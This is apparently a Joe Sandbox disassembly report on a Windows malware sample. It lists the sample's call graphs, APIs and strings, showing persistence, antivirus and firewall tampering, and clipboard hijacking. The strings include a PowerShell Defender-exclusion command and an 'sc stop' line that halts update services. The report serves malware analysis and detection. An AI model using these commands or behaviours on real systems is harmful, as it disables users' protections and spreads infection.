5687->5684 5687->5686 5688->5675 5689 40db50 5694 401b60 5689->5694 5691 40db65 5692 40db84 5691->5692 5693 401b60 16 API calls 5691->5693 5693->5692 5695 401b70 5694->5695 5713 401c42 5694->5713 5696 40a740 7 API calls 5695->5696 5695->5713 5697 401b9d 5696->5697 5698 40abd0 8 API calls 5697->5698 5697->5713 5699 401bc9 5698->5699 5700 401be6 5699->5700 5701 401bd6 5699->5701 5702 401ae0 4 API calls 5700->5702 5703 40ab60 _invalid_parameter 3 API calls 5701->5703 5704 401bf3 5702->5704 5705 401bdc 5703->5705 5706 401c33 5704->5706 5707 401bfc EnterCriticalSection 5704->5707 5705->5691 5710 40ab60 _invalid_parameter 3 API calls 5706->5710 5708 401c13 5707->5708 5709 401c1f LeaveCriticalSection 5707->5709 5708->5709 5709->5691 5711 401c3c 5710->5711 5712 40ab60 _invalid_parameter 3 API calls 5711->5712 5712->5713 5713->5691 5714 40bdd0 5715 40bdd3 WaitForSingleObject 5714->5715 5716 40be01 5715->5716 5717 40bdeb InterlockedDecrement 5715->5717 5718 40bdfa 5717->5718 5718->5715 5719 40b510 16 API calls 5718->5719 5719->5718 5720 40dfd0 5730 4013b0 5720->5730 5723 40dff7 InterlockedExchangeAdd 5724 40e03b WaitForSingleObject 5723->5724 5725 40dfdd 5723->5725 5724->5725 5726 40e054 5724->5726 5725->5723 5725->5724 5729 40e05d 5725->5729 5742 40bbb0 EnterCriticalSection 5725->5742 5747 40bed0 5725->5747 5750 401330 5726->5750 5731 40a740 7 API calls 5730->5731 5732 4013bb CreateEventA socket 5731->5732 5733 4013f2 5732->5733 5734 4013f8 5732->5734 5735 401330 8 API calls 5733->5735 5736 401401 bind 5734->5736 5737 401462 5734->5737 5735->5734 5738 401444 CreateThread 5736->5738 5739 401434 5736->5739 5737->5725 5738->5737 5740 401330 8 API calls 5739->5740 5741 40143a 5740->5741 5741->5725 5743 40bbe7 LeaveCriticalSection 5742->5743 5744 40bbcf 5742->5744 5743->5725 5745 40c870 3 API calls 5744->5745 5746 40bbda 5745->5746 5746->5743 5748 40be30 13 API calls 5747->5748 5749 40bf11 5748->5749 5749->5725 5751 401339 5750->5751 5758 40139b 5750->5758 5752 401341 SetEvent 
WaitForSingleObject CloseHandle 5751->5752 5751->5758 5754 401369 5752->5754 5759 40138b 5752->5759 5755 40ab60 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5754->5755 5754->5759 5755->5754 5756 401395 5757 40ab60 _invalid_parameter 3 API calls 5756->5757 5757->5758 5758->5729 5760 40b4f0 shutdown closesocket 5759->5760 5760->5756 5761 40d9d0 5762 40d9e6 5761->5762 5766 40da3e 5761->5766 5763 40d9f0 5762->5763 5764 40da43 5762->5764 5765 40da93 5762->5765 5762->5766 5767 40a740 7 API calls 5763->5767 5769 40da68 5764->5769 5770 40da5b InterlockedDecrement 5764->5770 5795 40c570 5765->5795 5771 40d9fd 5767->5771 5772 40ab60 _invalid_parameter 3 API calls 5769->5772 5770->5769 5784 4023d0 5771->5784 5774 40da74 5772->5774 5775 40ab60 _invalid_parameter 3 API calls 5774->5775 5775->5766 5779 40da2b InterlockedIncrement 5779->5766 5781 40daf1 IsBadReadPtr 5782 40dab9 5781->5782 5782->5766 5782->5781 5783 40bf20 195 API calls 5782->5783 5800 40c670 5782->5800 5783->5782 5785 402413 5784->5785 5786 4023d9 5784->5786 5788 40b6f0 5785->5788 5786->5785 5787 4023ea InterlockedIncrement 5786->5787 5787->5785 5789 40b780 2 API calls 5788->5789 5790 40b6ff 5789->5790 5791 40b70d EnterCriticalSection 5790->5791 5792 40b709 5790->5792 5793 40b72c LeaveCriticalSection 5791->5793 5792->5766 5792->5779 5793->5792 5796 40c583 5795->5796 5797 40c5ad memcpy 5795->5797 5798 40a990 9 API calls 5796->5798 5797->5782 5799 40c5a4 5798->5799 5799->5797 5801 40c699 5800->5801 5802 40c68e 5800->5802 5801->5802 5803 40c6b1 memmove 5801->5803 5802->5782 5803->5802 5966 40f910 5967 40f92e 5966->5967 5969 40f9c4 5966->5969 5968 40fb45 NtQueryVirtualMemory 5967->5968 5971 40f949 5968->5971 5970 40fa30 RtlUnwind 5970->5971 5971->5969 5971->5970 5972 40d510 5973 40b6f0 4 API calls 5972->5973 5974 40d523 5973->5974 5975 40d53a 5974->5975 5977 40d550 InterlockedExchangeAdd 5974->5977 5978 40d56d 5977->5978 5988 40d566 5977->5988 5994 40d840 5978->5994 5981 40d58d InterlockedIncrement 
5991 40d597 5981->5991 5982 40bed0 13 API calls 5982->5991 5983 40d5c0 6001 40b3d0 inet_ntoa 5983->6001 5985 40d5cc 5986 40d690 InterlockedDecrement 5985->5986 6002 40b4f0 shutdown closesocket 5986->6002 5988->5975 5989 40a950 _invalid_parameter 7 API calls 5989->5991 5990 40d770 6 API calls 5990->5991 5991->5982 5991->5983 5991->5986 5991->5989 5991->5990 5992 40bf20 195 API calls 5991->5992 5993 40ab60 _invalid_parameter 3 API calls 5991->5993 5992->5991 5993->5991 5995 40d84d socket 5994->5995 5996 40d862 htons connect 5995->5996 5997 40d8bf 5995->5997 5996->5997 5999 40d8aa 5996->5999 5997->5995 5998 40d57d 5997->5998 5998->5981 5998->5988 6003 40b4f0 shutdown closesocket 5999->6003 6001->5985 6002->5988 6003->5998 6004 401920 GetTickCount WaitForSingleObject 6005 401ac9 6004->6005 6006 40194d WSAWaitForMultipleEvents 6004->6006 6007 4019f0 GetTickCount 6006->6007 6008 40196a WSAEnumNetworkEvents 6006->6008 6009 401a43 GetTickCount 6007->6009 6010 401a05 EnterCriticalSection 6007->6010 6008->6007 6024 401983 6008->6024 6013 401ab5 WaitForSingleObject 6009->6013 6014 401a4e EnterCriticalSection 6009->6014 6011 401a16 6010->6011 6012 401a3a LeaveCriticalSection 6010->6012 6018 401a29 LeaveCriticalSection 6011->6018 6046 401820 6011->6046 6012->6013 6013->6005 6013->6006 6016 401aa1 LeaveCriticalSection GetTickCount 6014->6016 6017 401a5f InterlockedExchangeAdd 6014->6017 6015 401992 accept 6015->6007 6015->6024 6016->6013 6064 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 6017->6064 6018->6013 6022 401a72 6022->6016 6022->6017 6065 40b4f0 shutdown closesocket 6022->6065 6024->6007 6024->6015 6025 401cf0 7 API calls 6024->6025 6026 4022c0 6024->6026 6025->6007 6027 4022d2 EnterCriticalSection 6026->6027 6028 4022cd 6026->6028 6029 4022e7 6027->6029 6030 4022fd LeaveCriticalSection 6027->6030 6028->6024 6029->6030 6031 402308 6030->6031 6032 40230f 6030->6032 6031->6024 6033 40a740 7 API calls 6032->6033 6034 402319 6033->6034 6035 402326 getpeername 
CreateIoCompletionPort 6034->6035 6036 4023b8 6034->6036 6038 4023b2 6035->6038 6039 402366 6035->6039 6068 40b4f0 shutdown closesocket 6036->6068 6040 40ab60 _invalid_parameter 3 API calls 6038->6040 6066 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 6039->6066 6040->6036 6041 4023c3 6041->6024 6043 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6067 4021e0 EnterCriticalSection LeaveCriticalSection 6043->6067 6045 4023ab 6045->6024 6047 40190f 6046->6047 6048 401830 6046->6048 6047->6012 6048->6047 6049 40183d InterlockedExchangeAdd 6048->6049 6049->6047 6055 401854 6049->6055 6050 401880 6051 401891 6050->6051 6078 40b4f0 shutdown closesocket 6050->6078 6054 4018a7 InterlockedDecrement 6051->6054 6056 401901 6051->6056 6054->6056 6055->6047 6055->6050 6069 4017a0 EnterCriticalSection 6055->6069 6057 402247 6056->6057 6058 402265 EnterCriticalSection 6056->6058 6057->6012 6059 40229c LeaveCriticalSection DeleteCriticalSection 6058->6059 6062 40227d 6058->6062 6060 40ab60 _invalid_parameter 3 API calls 6059->6060 6060->6057 6061 40ab60 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 6061->6062 6062->6061 6063 40229b 6062->6063 6063->6059 6064->6022 6065->6022 6066->6043 6067->6045 6068->6041 6070 401807 LeaveCriticalSection 6069->6070 6071 4017ba InterlockedExchangeAdd 6069->6071 6070->6055 6072 4017ca LeaveCriticalSection 6071->6072 6073 4017d9 6071->6073 6072->6055 6074 40ab60 _invalid_parameter 3 API calls 6073->6074 6075 4017fe 6074->6075 6076 40ab60 _invalid_parameter 3 API calls 6075->6076 6077 401804 6076->6077 6077->6070 6078->6051 6079 40dfa0 6082 401200 6079->6082 6081 40dfc2 6083 40121d 6082->6083 6096 401314 6082->6096 6084 40a950 _invalid_parameter 7 API calls 6083->6084 6083->6096 6085 401247 memcpy htons 6084->6085 6086 4012ed 6085->6086 6087 401297 sendto 6085->6087 6090 40ab60 _invalid_parameter 3 API calls 6086->6090 6088 4012b6 InterlockedExchangeAdd 6087->6088 6089 4012e9 6087->6089 6088->6087 6091 
4012cc 6088->6091 6089->6086 6092 40130a 6089->6092 6093 4012fc 6090->6093 6095 40ab60 _invalid_parameter 3 API calls 6091->6095 6094 40ab60 _invalid_parameter 3 API calls 6092->6094 6093->6081 6094->6096 6097 4012db 6095->6097 6096->6081 6097->6081 6098 40eba1 6099 40ebaa 6098->6099 6100 40ec9d 6099->6100 6101 40ec13 lstrcmpiW 6099->6101 6102 40ec93 SysFreeString 6101->6102 6103 40ec26 6101->6103 6102->6100 6104 40e990 2 API calls 6103->6104 6106 40ec34 6104->6106 6105 40ec85 6105->6102 6106->6102 6106->6105 6107 40ec63 lstrcmpiW 6106->6107 6108 40ec75 6107->6108 6109 40ec7b SysFreeString 6107->6109 6108->6109 6109->6105 5804 406de4 5813 406d8a 5804->5813 5805 406dba lstrcmpiW 5805->5813 5806 406f35 FindNextFileW 5807 406f51 FindClose 5806->5807 5808 406d5e lstrcmpW 5806->5808 5810 406f5e 5807->5810 5812 406d74 lstrcmpW 5808->5812 5808->5813 5809 406e21 PathMatchSpecW 5811 406e42 wsprintfW SetFileAttributesW DeleteFileW 5809->5811 5809->5813 5811->5813 5812->5813 5813->5805 5813->5806 5813->5809 5814 406e9f PathFileExistsW 5813->5814 5817 4067a0 11 API calls 5813->5817 5814->5813 5815 406eb5 wsprintfW wsprintfW 5814->5815 5815->5813 5816 406f1f MoveFileExW 5815->5816 5816->5806 5817->5813 6110 40792a ExitThread 5818 40e070 5824 401470 5818->5824 5820 40e084 5821 40e0af 5820->5821 5822 40e095 WaitForSingleObject 5820->5822 5823 401330 8 API calls 5822->5823 5823->5821 5825 401483 5824->5825 5826 401572 5824->5826 5825->5826 5827 40a740 7 API calls 5825->5827 5826->5820 5828 401498 CreateEventA socket 5827->5828 5829 4014cf 5828->5829 5832 4014d5 5828->5832 5830 401330 8 API calls 5829->5830 5830->5832 5831 4014e2 htons setsockopt bind 5833 401546 5831->5833 5834 401558 CreateThread 5831->5834 5832->5826 5832->5831 5835 401330 8 API calls 5833->5835 5834->5826 5837 401100 5834->5837 5836 40154c 5835->5836 5836->5820 5838 401115 ioctlsocket 5837->5838 5839 4011e4 5838->5839 5841 40113a 5838->5841 5840 40ab60 _invalid_parameter 3 API calls 5839->5840 5843 4011ea 
5840->5843 5842 4011cd WaitForSingleObject 5841->5842 5844 40a990 9 API calls 5841->5844 5845 401168 recvfrom 5841->5845 5846 4011ad InterlockedExchangeAdd 5841->5846 5842->5838 5842->5839 5844->5841 5845->5841 5845->5842 5848 401000 5846->5848 5849 401014 5848->5849 5850 40a740 7 API calls 5849->5850 5853 40103b 5849->5853 5850->5853 5852 40105b 5860 401580 5852->5860 5859 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5853->5859 5855 4010ec 5855->5841 5856 4010a3 IsBadReadPtr 5857 401071 5856->5857 5857->5855 5857->5856 5858 4010d8 memmove 5857->5858 5858->5857 5859->5852 5861 401592 5860->5861 5862 4015a5 memcpy 5860->5862 5864 40a990 9 API calls 5861->5864 5863 4015c1 5862->5863 5863->5857 5865 40159f 5864->5865 5865->5862 6111 40d6b0 6116 40d710 6111->6116 6113 40d6de 6115 40d710 send 6115->6113 6117 40d721 send 6116->6117 6118 40d6c3 6117->6118 6119 40d73e 6117->6119 6118->6113 6118->6115 6119->6117 6119->6118 6120 40d930 6121 40d934 6120->6121 6122 40bbb0 5 API calls 6121->6122 6123 40d950 WaitForSingleObject 6121->6123 6124 40d550 209 API calls 6121->6124 6125 40d975 6121->6125 6122->6121 6123->6121 6123->6125 6124->6121 6126 4059b0 GetWindowLongW 6127 4059d4 6126->6127 6128 4059f6 6126->6128 6129 4059e1 6127->6129 6130 405a67 IsClipboardFormatAvailable 6127->6130 6136 405a46 6128->6136 6137 405a2e SetWindowLongW 6128->6137 6145 4059f1 6128->6145 6133 405a04 SetClipboardViewer SetWindowLongW 6129->6133 6134 4059e7 6129->6134 6131 405a83 IsClipboardFormatAvailable 6130->6131 6132 405a7a 6130->6132 6131->6132 6138 405a98 IsClipboardFormatAvailable 6131->6138 6141 405ab5 OpenClipboard 6132->6141 6160 405b7c 6132->6160 6135 405be4 DefWindowProcA 6133->6135 6139 405b9d RegisterRawInputDevices ChangeClipboardChain 6134->6139 6134->6145 6140 405a4c SendMessageA 6136->6140 6136->6145 6137->6145 6138->6132 6139->6135 6140->6145 6142 405ac5 GetClipboardData 6141->6142 6141->6160 6144 405add GlobalLock 6142->6144 6142->6145 6143 405b85 SendMessageA 6143->6145 
6144->6145 6146 405af5 6144->6146 6145->6135 6147 405b08 6146->6147 6148 405b29 6146->6148 6150 405b3e 6147->6150 6151 405b0e 6147->6151 6149 40d250 13 API calls 6148->6149 6152 405b14 GlobalUnlock CloseClipboard 6149->6152 6167 4057f0 6150->6167 6151->6152 6161 405680 6151->6161 6156 405b67 6152->6156 6152->6160 6175 404970 lstrlenW 6156->6175 6159 40ab60 _invalid_parameter 3 API calls 6159->6160 6160->6143 6160->6145 6163 40568b 6161->6163 6162 405691 lstrlenW 6162->6163 6164 4056a4 6162->6164 6163->6162 6163->6164 6165 40a950 _invalid_parameter 7 API calls 6163->6165 6166 4056c1 lstrcpynW 6163->6166 6164->6152 6165->6163 6166->6163 6166->6164 6172 4057fd 6167->6172 6168 405803 lstrlenA 6168->6172 6173 405816 6168->6173 6169 405740 2 API calls 6169->6172 6170 40a950 _invalid_parameter 7 API calls 6170->6172 6172->6168 6172->6169 6172->6170 6172->6173 6174 40ab60 _invalid_parameter 3 API calls 6172->6174 6209 4057a0 6172->6209 6173->6152 6174->6172 6183 4049a4 6175->6183 6176 404bfd 6176->6159 6177 404e81 StrStrW 6179 404e94 6177->6179 6180 404e98 StrStrW 6177->6180 6178 404c0f 6178->6176 6178->6177 6179->6180 6181 404eab 6180->6181 6182 404eaf StrStrW 6180->6182 6181->6182 6184 404ec2 6182->6184 6183->6176 6183->6178 6186 404d90 StrStrW 6183->6186 6196 404ed8 6184->6196 6214 4048a0 lstrlenW 6184->6214 6186->6178 6187 404dbb StrStrW 6186->6187 6187->6178 6188 404de6 StrStrW 6187->6188 6188->6178 6189 4054aa StrStrW 6193 4054c4 StrStrW 6189->6193 6194 4054bd 6189->6194 6190 40544f StrStrW 6191 405462 6190->6191 6192 40546b StrStrW 6190->6192 6191->6189 6192->6191 6195 405487 StrStrW 6192->6195 6197 4054d7 6193->6197 6198 4054de StrStrW 6193->6198 6194->6193 6195->6191 6196->6176 6196->6189 6196->6190 6197->6198 6199 4054f1 6198->6199 6200 4054f8 StrStrW 6198->6200 6199->6200 6201 405512 StrStrW 6200->6201 6202 40550b 6200->6202 6203 405525 lstrlenA 6201->6203 6202->6201 6203->6176 6205 4055ff GlobalAlloc 6203->6205 6205->6176 6206 40561a GlobalLock 6205->6206 
6206->6176 6207 40562d memcpy GlobalUnlock OpenClipboard 6206->6207 6207->6176 6208 40565a EmptyClipboard SetClipboardData CloseClipboard 6207->6208 6208->6176 6210 4057ab 6209->6210 6211 4057b1 lstrlenA 6210->6211 6212 405740 2 API calls 6210->6212 6213 4057e4 6210->6213 6211->6210 6212->6210 6213->6172 6217 4048c4 6214->6217 6215 404911 iswalpha 6215->6217 6218 40492c iswdigit 6215->6218 6216 40490d 6216->6196 6217->6215 6217->6216 6217->6218 6218->6217 5866 4084f9 5867 408502 5866->5867 5868 408511 34 API calls 5867->5868 5869 409346 5867->5869 6219 405fbd 6221 405f51 6219->6221 6220 40ab60 _invalid_parameter 3 API calls 6222 405fc8 LeaveCriticalSection 6220->6222 6223 405fa6 memcpy 6221->6223 6224 405fbb 6221->6224 6223->6224 6224->6220 6226 40ac3e 6227 40ab60 _invalid_parameter 3 API calls 6226->6227 6230 40abfd 6227->6230 6228 40ac12 6229 40a950 _invalid_parameter 7 API calls 6229->6230 6230->6228 6230->6229 6231 40ac14 memcpy 6230->6231 6231->6230

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                    control_flow_graph 0 407940-407974 Sleep CreateMutexA GetLastError 1 407976-407978 ExitProcess 0->1 2 40797e-407a1d GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 407d31-407d9d Sleep ShellExecuteW * 2 RegOpenKeyExW 2->3 4 407a23-407a2e call 40f1b0 2->4 6 407dcb-407df6 RegOpenKeyExW 3->6 7 407d9f-407dc5 RegSetValueExW RegCloseKey 3->7 13 407a30-407a32 ExitProcess 4->13 14 407a38-407a86 ExpandEnvironmentStringsW wsprintfW CopyFileW 4->14 8 407e24-407e4f RegOpenKeyExW 6->8 9 407df8-407e1e RegSetValueExW RegCloseKey 6->9 7->6 11 407e51-407e77 RegSetValueExW RegCloseKey 8->11 12 407e7d-407ea8 RegOpenKeyExW 8->12 9->8 11->12 15 407ed6-407f01 RegOpenKeyExW 12->15 16 407eaa-407ed0 RegSetValueExW RegCloseKey 12->16 17 407b36-407b78 Sleep wsprintfW CopyFileW 14->17 18 407a8c-407ac6 SetFileAttributesW RegOpenKeyExW 14->18 19 407f03-407f29 RegSetValueExW RegCloseKey 15->19 20 407f2f-407f5a RegOpenKeyExW 15->20 16->15 22 407c28-407c81 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 17->22 23 407b7e-407bb8 SetFileAttributesW RegOpenKeyExW 17->23 18->17 21 407ac8-407afb wcslen RegSetValueExW 18->21 19->20 25 407f88-407fb3 RegOpenKeyExW 20->25 26 407f5c-407f82 RegSetValueExW RegCloseKey 20->26 27 407b29-407b30 RegCloseKey 21->27 28 407afd-407b1f RegCloseKey call 40f400 21->28 22->3 24 407c87-407cc1 SetFileAttributesW RegOpenKeyExW 22->24 23->22 29 407bba-407bed wcslen RegSetValueExW 23->29 24->3 32 407cc3-407cf6 wcslen RegSetValueExW 24->32 34 407fb5-408019 RegSetValueExW * 3 RegCloseKey 25->34 35 40801f-40804a RegOpenKeyExW 25->35 26->25 27->17 28->27 44 407b21-407b23 ExitProcess 28->44 30 407c1b-407c22 RegCloseKey 29->30 31 407bef-407c11 RegCloseKey call 40f400 29->31 30->22 31->30 49 407c13-407c15 ExitProcess 31->49 37 407d24-407d2b RegCloseKey 32->37 38 407cf8-407d1a RegCloseKey call 40f400 
32->38 34->35 40 408050-4080d3 RegSetValueExW * 4 RegCloseKey 35->40 41 4080d9-408104 RegOpenKeyExW 35->41 37->3 38->37 52 407d1c-407d1e ExitProcess 38->52 40->41 45 4081f0-40821b RegOpenKeyExW 41->45 46 40810a-4081ea RegSetValueExW * 7 RegCloseKey 41->46 47 408221-408301 RegSetValueExW * 7 RegCloseKey 45->47 48 408307-40831c Sleep call 40d180 45->48 46->45 47->48 54 408491-40849a 48->54 55 408322-40848e WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405c00 call 40e0c0 call 407390 CreateEventA call 40c8b0 call 40dbb0 call 40bc70 call 40dbe0 * 4 call 40dd50 call 40de90 48->55 55->54
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 0040794E
                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,mmn7nnm8na), ref: 0040795D
                                                                                                                                    • GetLastError.KERNEL32 ref: 00407969
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00407978
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004161D0,00000105), ref: 004079B2
                                                                                                                                    • PathFindFileNameW.SHLWAPI(004161D0), ref: 004079BD
                                                                                                                                    • wsprintfW.USER32 ref: 004079DA
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 004079EA
                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407A01
                                                                                                                                    • wcscmp.NTDLL ref: 00407A13
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00407A32
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                                                                    • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -$/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait$AlwaysAutoUpdate$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$AutoUpdateOptions$DisableWindowsUpdate$DisableWindowsUpdate$EnableWindowsUpdate$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$OverrideNotice$PreventDownload$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$cmd.exe$cmd.exe$mmn7nnm8na$open$open$sysppvrdnvs.exe
                                                                                                                                    • API String ID: 4172876685-159212852
                                                                                                                                    • Opcode ID: a4de16f9cd9a57b13bb64e1272bcdec428ac0ec926cd71be17685e2324921950
                                                                                                                                    • Instruction ID: 367eef7d7cdc4f6bbf58631969cb55eb0d30a7b17f9c19f9a6cac2e90da0940f
                                                                                                                                    • Opcode Fuzzy Hash: a4de16f9cd9a57b13bb64e1272bcdec428ac0ec926cd71be17685e2324921950
                                                                                                                                    • Instruction Fuzzy Hash: 245240B1A80318BBE7209BA0DC4AFD97775AB48B15F1081A5B309B61D0D7F5AAC4CF5C

                                                                                                                                    Control-flow Graph

                                                                                                                                    control_flow_graph 82 4068e0-4068f5 _chkstk 83 4068f7-4068f9 82->83 84 4068fe-4069d0 wsprintfW * 6 PathFileExistsW 82->84 85 406f64-406f67 83->85 86 4069d2-4069f3 call 40f1f0 84->86 87 406a14-406a23 PathFileExistsW 84->87 86->87 99 4069f5-406a0e SetFileAttributesW DeleteFileW 86->99 89 406ac4-406acd 87->89 90 406a29-406a38 PathFileExistsW 87->90 91 406af5-406b04 PathFileExistsW 89->91 92 406acf-406ada call 4064a0 89->92 94 406a59-406a68 PathFileExistsW 90->94 95 406a3a-406a53 SetFileAttributesW DeleteFileW 90->95 100 406b06-406b26 call 40f1f0 91->100 101 406b47-406b56 PathFileExistsW 91->101 92->91 113 406adc-406af0 call 40f1f0 92->113 96 406a6a-406a7b CreateDirectoryW 94->96 97 406a8c-406a9b PathFileExistsW 94->97 95->94 96->97 102 406a7d-406a86 SetFileAttributesW 96->102 97->89 105 406a9d-406ab3 CopyFileW 97->105 99->87 100->101 114 406b28-406b41 SetFileAttributesW DeleteFileW 100->114 103 406b58-406b62 101->103 104 406bca-406bd9 PathFileExistsW 101->104 102->97 103->104 109 406b64-406b71 PathFileExistsW 103->109 111 406c75-406c96 FindFirstFileW 104->111 112 406bdf-406bee PathFileExistsW 104->112 105->89 110 406ab5-406abe SetFileAttributesW 105->110 109->104 115 406b73-406b89 CopyFileW 109->115 110->89 118 406c9c-406d54 111->118 119 406f5e 111->119 116 406bf0-406bf6 112->116 117 406c2c-406c32 112->117 113->91 114->101 115->104 123 406b8b-406ba9 SetFileAttributesW PathFileExistsW 115->123 124 406c12-406c27 call 406660 116->124 125 406bf8-406c10 call 406660 116->125 121 406c34-406c4c call 406660 117->121 122 406c4e-406c63 call 406660 117->122 126 406d5e-406d72 lstrcmpW 118->126 119->85 143 406c66-406c6f SetFileAttributesW 121->143 122->143 123->104 130 406bab-406bc4 SetFileAttributesW DeleteFileW 123->130 142 406c2a 124->142 125->142 132 406d74-406d88 lstrcmpW 126->132 133 406d8a 126->133 130->104 132->133 139 406d8f-406da0 132->139 140 406f35-406f4b FindNextFileW 133->140 141 406db1-406db8 139->141 140->126 144 406f51-406f58 FindClose 140->144 145 406de6-406def 141->145 146 406dba-406dd7 lstrcmpiW 141->146 142->143 143->111 144->119 149 406df1 145->149 150 406df6-406e07 145->150 147 406dd9 146->147 148 406ddb-406de2 146->148 147->141 148->145 149->140 152 406e18-406e1f 150->152 153 406e21-406e3e PathMatchSpecW 152->153 154 406e8f-406e98 152->154 155 406e40 153->155 156 406e42-406e88 wsprintfW SetFileAttributesW DeleteFileW 153->156 157 406e9a 154->157 158 406e9f-406eae PathFileExistsW 154->158 155->152 156->154 157->140 159 406eb0 158->159 160 406eb5-406f05 wsprintfW * 2 158->160 159->140 162 406f07-406f1d call 4067a0 160->162 163 406f1f-406f2f MoveFileExW 160->163 162->140 163->140
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$wsprintf$ExistsPath$AttributesDelete$CreateDirectory_chkstk
                                                                                                                                    • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\rvlcfg.exe$%s\%s\rvldrv.exe$%s\*$shell32.dll$shell32.dll$shell32.dll$shell32.dll
                                                                                                                                    • API String ID: 495142193-638321828
                                                                                                                                    • Opcode ID: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                    • Instruction ID: 1e7642a3bb229a683b77cec8f60a4b6186945a0df842d4041ba496de3fd539ef
                                                                                                                                    • Opcode Fuzzy Hash: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                    • Instruction Fuzzy Hash: 500270B5900218EBDB20DB60DC44FEA7778BF44705F0485EAF50AA6190DBB89BD4CF69

                                                                                                                                    Control-flow Graph

                                                                                                                                    control_flow_graph 744 4067a0-4067ef CreateDirectoryW wsprintfW FindFirstFileW 745 4067f5-406809 lstrcmpW 744->745 746 4068cf-4068d2 744->746 747 406821 745->747 748 40680b-40681f lstrcmpW 745->748 750 40689c-4068b2 FindNextFileW 747->750 748->747 749 406823-40686c wsprintfW * 2 748->749 751 406886-406896 MoveFileExW 749->751 752 40686e-406884 call 4067a0 749->752 750->745 753 4068b8-4068c9 FindClose RemoveDirectoryW 750->753 751->750 752->750 753->746
                                                                                                                                    APIs
                                                                                                                                    • CreateDirectoryW.KERNEL32(00406F1A,00000000), ref: 004067AF
                                                                                                                                    • wsprintfW.USER32 ref: 004067C5
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004067DC
                                                                                                                                    • lstrcmpW.KERNEL32(?,00411368), ref: 00406801
                                                                                                                                    • lstrcmpW.KERNEL32(?,0041136C), ref: 00406817
                                                                                                                                    • wsprintfW.USER32 ref: 0040683A
                                                                                                                                    • wsprintfW.USER32 ref: 0040685A
                                                                                                                                    • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406896
                                                                                                                                    • FindNextFileW.KERNEL32(000000FF,?), ref: 004068AA
                                                                                                                                    • FindClose.KERNEL32(000000FF), ref: 004068BF
                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 004068C9
